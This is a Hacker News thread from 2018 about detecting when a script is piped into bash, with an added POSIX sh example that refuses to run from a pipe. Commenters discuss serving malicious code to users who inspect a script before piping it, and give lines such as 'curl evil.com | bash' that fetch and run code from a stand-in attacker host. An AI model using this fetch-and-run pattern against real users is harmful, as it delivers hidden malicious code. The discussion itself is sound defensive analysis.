zlacker

1. kazina+(OP) 2018-07-29 04:04:26
You could just have the script detect that its stdin is a pipe. E.g., Linux-specific:

  $ echo 'ls -l /proc/$$/fd/0' | bash
  lr-x------ 1 kaz kaz 64 Jul 28 21:03 /proc/23814/fd/0 -> pipe:[4307360]
Here, our script consists of the ls command; it shows that when we pipe it to bash, it finds fd 0 to be a pipe.

We can make some code conditional on this to produce a "don't run this script from a pipe" diagnostic.

This is superior to the dodgy, delay-based server-side detection because it is reliable.

Also, it still works when someone does this:

  $ curl <url> > file
  $ cat file | bash
Of course, no protection for

  $ bash file
replies(1): >>ericpa+y
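The check described in the comment above, written out as a small POSIX sh script. This is an added example, not the commenter's code or anything from the thread. It assumes that /dev/stdin resolves to the file actually open on fd 0 (true on Linux, where it links to /proc/self/fd/0, and on BSD-derived systems), and the function names are illustrative. The /proc-based helper mirrors the comment's `ls -l /proc/$$/fd/0`, but reads /proc/self: when the check runs inside a pipeline it executes in a subshell whose fd 0 is the pipe, while `$$` still names the parent shell.

```shell
#!/bin/sh
# Added example (not from the thread): classify what a script's standard
# input is connected to, and refuse to run when it is a pipe.  Function
# names are illustrative; /dev/stdin resolving to the open fd is assumed.

# Linux-only: what /proc says fd 0 points at, e.g. "pipe:[4307360]" or
# "/dev/pts/3".  /proc/self (not /proc/$$) is used because readlink's own
# process inherited the fd being classified; in a pipeline the calling
# function runs in a subshell and $$ still names the parent shell.
stdin_target() {
  readlink /proc/self/fd/0 2>/dev/null || echo unavailable
}

# Portable classification via the stat-based tests on /dev/stdin; test(1)
# follows the link to the open file.  Prints one of:
#   tty pipe file device other
stdin_kind() {
  if [ -t 0 ]; then
    echo tty
  elif [ -p /dev/stdin ]; then
    echo pipe
  elif [ -f /dev/stdin ]; then
    echo file
  elif [ -c /dev/stdin ]; then
    echo device
  else
    echo other
  fi
}

# The guard a script would put near its top.  Returns 1 (with a diagnostic
# on stderr) when fed through a pipe such as `curl ... | sh` or
# `cat file | sh`; returns 0 for `sh file`, `sh < file` or an interactive
# shell.  `sh file` is deliberately not rejected: the user has the file.
refuse_if_piped() {
  if [ "$(stdin_kind)" = pipe ]; then
    echo "refusing to run from a pipe (stdin is $(stdin_target));" \
         "save the script, read it, then run the saved copy" >&2
    return 1
  fi
  return 0
}

# Demonstration with constructed inputs: feed stdin_kind the ways seen in
# the thread and print what a script would see from its own side.
echo "piped:      $(printf 'ls\n' | stdin_kind)"
tmpf=$(mktemp)
echo "redirected: $(stdin_kind <"$tmpf")"
rm -f "$tmpf"
echo "inherited:  $(stdin_kind)"
```

Run it as `sh guard.sh` and again as `cat guard.sh | sh` to see the two classifications differ. The guard only tells a script how it was invoked; it does nothing against a server that serves different content to `curl` than to `curl | bash`, and anyone reading the script sees the check, which is the objection raised in the reply below.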
2. ericpa+y 2018-07-29 04:20:02
>>kazina+(OP)
This logic would be detectable to a user who reads the script. The goal here is to trick users who first inspect the script and then `curl | bash`.
replies(1): >>nerdpo+X
3. nerdpo+X 2018-07-29 04:27:27
>>ericpa+y
If you downloaded the script to inspect it, why would you not just run the script that you downloaded?
replies(4): >>jchw+61 >>chmod7+t6 >>tutfbh+oc >>IshKeb+Hc
4. jchw+61 2018-07-29 04:30:49
>>nerdpo+X
Web browser.
5. chmod7+t6 2018-07-29 06:44:54
>>nerdpo+X

    curl evil.com
    curl evil.com | bash
replies(1): >>nerdpo+Rp
6. tutfbh+oc 2018-07-29 09:22:40
>>nerdpo+X
That's the point. It's also possible that the remote script has been altered in the meantime. Therefore it's never advisable to download the script again after inspection.
7. IshKeb+Hc 2018-07-29 09:28:04
>>nerdpo+X
There's more than one user. You don't want any of them to find the malicious code.
8. nerdpo+Rp 2018-07-29 13:38:40
>>chmod7+t6

    wget evil.com
    less evil.sh
    bash evil.sh